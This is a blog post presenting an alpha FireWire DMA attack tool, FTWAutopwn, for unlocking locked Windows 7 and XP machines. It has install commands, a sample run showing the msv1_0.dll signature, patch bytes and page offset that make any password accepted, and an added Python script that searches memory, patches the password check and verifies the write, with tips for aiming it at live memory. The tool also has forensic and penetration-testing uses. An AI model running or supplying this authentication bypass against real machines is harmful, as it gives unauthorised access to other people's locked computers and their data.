Update: FTWAutopwn has been renamed Inception. I have created a standalone page for the tool here; please refer to that page for updates on the tool.
For the last few days I have been working on an alternative to winlockpwn (unlocking locked Windows boxes through FireWire SBP-2 DMA), built on libforensic1394. I have now released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn), on GitHub. Here is how to use it:
Check that your distro uses the new IEEE1394 stack
$ ls /dev | grep fw
If the new stack (the firewire-* modules) is loaded and the system has at least one FireWire port, `fw0` is printed; additional ports and devices appear as fw<n>. If nothing is listed, the old ieee1394 stack is most likely still loaded. That sucks; on Debian/Ubuntu, unload the old modules and load the new OHCI driver instead:
sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394
sudo modprobe firewire-ohci
Download and install libforensic1394
sudo apt-get install git cmake python3
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz
tar xvf libforensic1394-0.2.tar.gz
cd libforensic1394-0.2
mkdir build
cd build
cmake -G"Unix Makefiles" ../
make
sudo make install
cd ../python
sudo python3 setup.py install
Download and use FTWAutopwn
cd
git clone https://github.com/carmaa/FTWAutopwn.git
cd FTWAutopwn
python3 ftwautopwn.py
The last command should now run. Connect the attacking machine to a locked Windows 7 or XP machine with an IEEE 1394 FireWire cable and run it. Give the target a few seconds to enumerate the SBP-2 device that libforensic1394 presents (the -d/--delay switch exists for exactly this), select the correct target, and you are off:
$ python3 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.1 by Carsten Maartmann-Moe <[email protected]> 2011
For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
  Win7 32-bit msv1_0.dll technique
  Win7 64-bit msv1_0.dll technique
  WinXP SP2 msv1_0.dll technique
  WinXP SP3 msv1_0.dll technique
Please select target: 4
[+] You have selected: WinXP SP3 msv1_0.dll technique
Using signature: 83f8107511b0018b
Using patch: 83f8109090b0018b
Using offset: 2146
[+] Searching for signature, 12 MiB so far.
[+] Signature found at 0xd7d862.
[+] Write-back verified; patching successful. Bon voyage!
You should now be able to log on to the target machine with any password.
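What the run above actually does, as an added example that is not FTWAutopwn's own code: the three "Using ..." lines are a byte pattern inside msv1_0.dll's password check, the same pattern with the conditional jump replaced by two NOPs, and the offset inside a 4 KiB page at which the pattern is expected (0xd7d862 mod 4096 is indeed 2146, which is why only that page offset has to be compared). Decoding the signature gives `83 f8 10` (cmp eax, 0x10), `75 11` (jnz +0x11), `b0 01` (mov al, 1); patching the jnz to `90 90` makes the success path unconditional. The script below implements that page-by-page search, the patch, and the read-back verification over a memory image in a file, the case the -f switch covers. The class and function names are this example's own, the image is constructed inline, and the remark that forensic1394's Device object has a read(addr, n) / write(addr, buf) pair of the same shape is an assumption drawn from the library's Python bindings; check it against the libforensic1394 docs before swapping the file backend for live FireWire memory.

```python
# Added example, not FTWAutopwn's own code: signature search and patch over a
# memory image, page by page, with read-back verification.
import io
from typing import Optional, Tuple

PAGE = 4096

# WinXP SP3 msv1_0.dll values from the run above.
#   83 f8 10   cmp eax, 0x10
#   75 11      jnz +0x11        <- patched to 90 90 (nop; nop)
#   b0 01      mov al, 1
#   8b ...     first byte of the next instruction
SIGNATURE = bytes.fromhex("83f8107511b0018b")
PATCH = bytes.fromhex("83f8109090b0018b")
OFFSET = 2146  # byte offset inside a 4 KiB page at which the signature sits


class FileMemory:
    """Read/write access to a memory dump in a seekable file object (the -f case).

    Assumption: forensic1394's Device exposes read(addr, n) / write(addr, buf)
    with the same shape, so the search below can be pointed at live FireWire
    memory by swapping this class for an opened Device.
    """

    def __init__(self, f):
        self.f = f

    def size(self) -> int:
        self.f.seek(0, io.SEEK_END)
        return self.f.tell()

    def read(self, addr: int, n: int) -> bytes:
        self.f.seek(addr)
        return self.f.read(n)

    def write(self, addr: int, buf: bytes) -> None:
        self.f.seek(addr)
        self.f.write(buf)


def find_signature(mem, signature: bytes, offset: int,
                   start: int = 0, chunk: int = 16 * PAGE) -> Optional[int]:
    """Return the address of `signature`, or None if it is not present.

    Memory is read in page-aligned chunks and only the bytes at `offset`
    inside each page are compared; a copy of the same bytes at a different
    page offset is deliberately not a hit.
    """
    assert chunk % PAGE == 0
    size = mem.size()
    addr = start - start % PAGE  # align the start address down to a page
    while addr < size:
        data = mem.read(addr, min(chunk, size - addr))
        for page in range(0, len(data), PAGE):
            at = page + offset
            if data[at:at + len(signature)] == signature:
                return addr + at
        addr += chunk
    return None


def patch_signature(mem, signature: bytes, patch: bytes, offset: int,
                    dry_run: bool = False) -> Tuple[Optional[int], bool]:
    """Locate, patch and verify. Returns (address or None, write_verified).

    dry_run mirrors -n/--no-write: locate only, never write to memory.
    """
    assert len(signature) == len(patch)
    addr = find_signature(mem, signature, offset)
    if addr is None or dry_run:
        return addr, False
    mem.write(addr, patch)
    # Read back, as the tool does ("Write-back verified"): a DMA write can
    # fail silently, so the write is not trusted without this check.
    return addr, mem.read(addr, len(patch)) == patch


def build_sample_image(pages: int = 4) -> io.BytesIO:
    """Constructed 16 KiB image: the signature at page 2 + OFFSET, plus a decoy
    copy at a wrong page offset that must not be matched."""
    buf = bytearray(pages * PAGE)
    decoy = 1 * PAGE + 100
    buf[decoy:decoy + len(SIGNATURE)] = SIGNATURE
    real = 2 * PAGE + OFFSET
    buf[real:real + len(SIGNATURE)] = SIGNATURE
    return io.BytesIO(buf)


if __name__ == "__main__":
    mem = FileMemory(build_sample_image())
    addr, ok = patch_signature(mem, SIGNATURE, PATCH, OFFSET)
    print(f"signature at {addr:#x}, write-back verified: {ok}")
```

Run with no arguments it reports the constructed image's hit at 0x2862 (page 2, offset 2146) and a verified write-back; a second search afterwards finds nothing, since the patched bytes no longer match the signature. Keep the dry-run path in mind when generating signatures for new targets: it lets you confirm the offset against a dump taken with -f before writing anything into a live machine.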
Full syntax is provided by the -h/--help switch:
$ python3 ftwautopwn.py -h
Fire Through the Wire Autopwn v.0.0.1 by Carsten Maartmann-Moe <[email protected]> 2011
For updates, check out https://github.com/carmaa/FTWAutopwn
Usage: ftwautopwn [OPTIONS]
  -d, --delay=TIME: Delay attack by TIME seconds. This is useful in order to guarantee that the target machine has successfully installed the SBP2 device before attacking. If the attack fails, try to increase this value.
  -f, --file=FILE: Use a file instead of FireWire bus data as input; for example to facilitate attacks on VMware machines or to ease testing and signature generation efforts
  -h, --help: Displays this message
  -l, --list: Lists available target operating systems
  -n, --no-write: Dry run, do not write back to memory
  -t TARGET, --target=TARGET: Specify target operating system (use --list to list available targets)
  -v, --verbose: Verbose mode